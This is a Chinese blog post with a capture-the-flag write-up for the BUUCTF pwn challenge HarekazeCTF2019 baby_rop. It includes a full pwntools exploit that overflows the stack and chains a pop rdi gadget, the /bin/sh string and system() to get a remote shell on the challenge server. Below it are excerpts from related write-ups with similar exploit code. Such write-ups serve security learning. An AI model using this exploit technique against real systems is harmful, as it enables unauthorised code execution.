BUUCTF-PWN-[HarekazeCTF2019]baby_rop

最新推荐文章于 2025-01-10 19:31:29 发布
原创 最新推荐文章于 2025-01-10 19:31:29 发布 · 197 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个名为BabyROP的程序漏洞分析过程,通过使用checksec检查文件安全特性,借助IDA进行反汇编分析,并最终利用ROP技术构造payload实现远程代码执行。

文章目录

查看文件信息

checksec 一下 开了个NX保护
在这里插入图片描述

IDA 分析

我们扔进IDA64里面 查看反汇编代码 以及 伪代码,给我的感觉就是v4 能溢出 然后连到/bin/sh 利用万能的gadget,pop rdi ret
在这里插入图片描述
在这里插入图片描述

exp

from pwn import *

elf = ELF('./babyrop')

#r = process('babyrop')
r = remote('node3.buuoj.cn',28916)

system = elf.symbols['system']
print hex(system)

bin_addr = elf.search('/bin/sh').next()
print hex(bin_addr)

ret_edi = 0x0400683

r.recvuntil('? ')

payload = 'a' * (0x10+8) + p64(ret_edi)+p64(bin_addr)+p64(system)

r.sendline(payload)

r.interactive()

一个坑就是 要find -name “flag” 找下flag的位置
然后就发现
在这里插入图片描述
在这 cat ./home/babyrop/flag 就行了

buuctf|[HarekazeCTF2019]baby_rop 1
m0_64236521的博客
05-02 1456
buuctf|[HarekazeCTF2019]baby_rop 1 分析 下载文件重命名为pwn_15,checksec一下 只开启了NX,64位,用ida看看 这里可以栈溢出,同时在侧面看到了system() shift+F12查看字符串 找到binsh,由于是64位,我们要寄存器传参,ROPgadget下 exp如下 from pwn import* p=remote('node4.buuoj.cn',25977) #p=process("./pwn_15") system_addr=0x
BUUCTF - PWNbabyrop
古月浪子的博客
03-25 1878
checksec一下,可以栈溢出 IDA打开看看,读取随机数作为参数传入函数中 读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较 返回的字节作为read的长度,buf只有231字节,可以通过传入255来栈溢出,然后就是标准的ret2libc了 from pwn import * from LibcSearcher import * co...
[HarekazeCTF2019]baby_rop[BUUCTF]
moonlightsunshin的博客
05-05 567
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
BUUCTF [HarekazeCTF2019]baby_rop
最新发布
2401_88087539的博客
01-10 451
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
buuctf [HarekazeCTF2019]baby_rop
carol2358的博客
04-17 491
可以在程序里找到binsh,ctrl+L, 程序本身有system函数 找到rop 修改system参数为/bin/sh,然后跳转到system运行就可以了,最后加一个假的返回地址 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level...
BUUCTF Pwn [HarekazeCTF2019]baby_rop2 题解
qq_33348179的博客
12-16 385
因为这是64位程序 所以用寄存器传参;又因为printf得传至少2个参数 所以要用到寄存器RDI RSI。查到的rsi多了个r15寄存器 但不需要用到 所以写payload的时候记得填充它。这里的打印函数是printf 所以利用printf函数的plt输出真实地址got。查看main函数 看到给了个libc说明这题是ret2libc题。但printf的got好像不行 所以换成了read的got。第一个rdi传入printf里的格式化字符串。下载 得到两个文件 checksec。64位 拖入IDA64。
buuctf|pwn-[HarekazeCTF2019]baby_rop-wp
l2645470582_的博客
11-08 325
1.例行检查 我们看到该文件开启了堆保护 2.我们用64位的IDA打开该文件 按shift+f12查看关键字符串,我们看到“/bin/sh”这个关键字符串 我们双击查看它的位置:0x0601048 3.我们去main函数里面看看 我们发现v4 = var_10,他的地址为:0x10 我们要拿到权限:system("/bin/sh") 所以我们要找到system地址:0x0400490 我们双击_system,system在plt表里面 4...
BUUCTF-[HarekazeCTF2019]baby_rop2
Rt1Text的博客
11-08 468
泄露libc基地址,计算system,bin/sh地址,覆盖返回地址。最后ls没有发现flag,寻找flag。还要注意64位传参,寄存器的使用。直接cat flag在的位置即可。
BUUCTF|PWN-[HarekazeCTF2019]baby_rop2-WP
l2645470582_的博客
01-18 733
1.检查保护机制 开启了堆栈不可执行 2.用64位IDA打开该文件 (1)shift+f12,查看关键字符串 (2)双击,ctrl+x,进入反汇编代码 (3)ROPgadget查看返回地址 (4)payload payload = b'a'*(0x20+0x8) + p64(pop_rdi) + p64(format_) + p64(pop_r15) + p64(got_addr) + p64(0) + p64(plt_addr) + p64(main_addr) 1.
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 5491
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 2099
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
buuctf babyrop
carol2358的博客
04-08 640
pwn菜鸡争取一天写一道吧,记录一下做题过程,方便复现 先checksec ida f5 大致的流程就是先生成一个随机数,然后将这个随机数放入buf,再把buf传到71F 在71F里,buf变成a1,把a1放入s,然后往71F的buf里输入数据,这一步要注意,我们要做的是通过传入数据,把v5覆盖掉,因为返回值是v5,而v5和buf的关系在stack里是这样的 所以我们传入7个以上的字节(...
BUUCTF - PWNbaby_rop
古月浪子的博客
04-05 462
checksec一下,栈溢出 IDA打开看看,很明显的溢出点,/bin/sh字符串在程序里也有现成的,通过ROPgadget找到pop rdi命令即可将/bin/sh作为参数调用system from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_leve...
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop
mcmuyanga的博客
09-01 760
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop 附件 步骤: 例行检查,64位,开启了NX保护 试运行一下程序,看这个情况,当我们输入太长字符串的时候会报错 64位ida载入,shift+f12查看程序里的字符串,看到了system 和 ‘/bin/sh’ 双击跟进,ctrl+x查看一下哪里调用了字符串,没有找到函数,只找到了地址 shell=0x601048 system=0x400496 找到输入点,没有限制v4读入的数据,可以造成溢出,跟pwn16差不
[HarekazeCTF2019]baby_rop
m0sway的博客
03-26 675
[HarekazeCTF2019]baby_rop WriteUp BUU_PWN
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2743
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
PWN——Buuoj [HarekazeCTF2019]baby_rop
u014377094的博客
01-21 799
先用IDA64打开,发现scanf看一眼存入数据的位置 熟悉的味道 按一下shift f12 system函数和/bin/sh都给了那就不客气了 困难题我唯唯诺诺,简单题我重拳出击 思路明确,现在还需要pop rdi,ret来传一下参数(str“/bin/sh)到system里 这个时候用到了ROPgadget 里面的babyrop是这道题的文件名,其他题换一下就ok 现在找到了地址,准备工作完成,敲python 有一点需要注意的是,咱们明明找的是400683,搁ida里咋面目
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值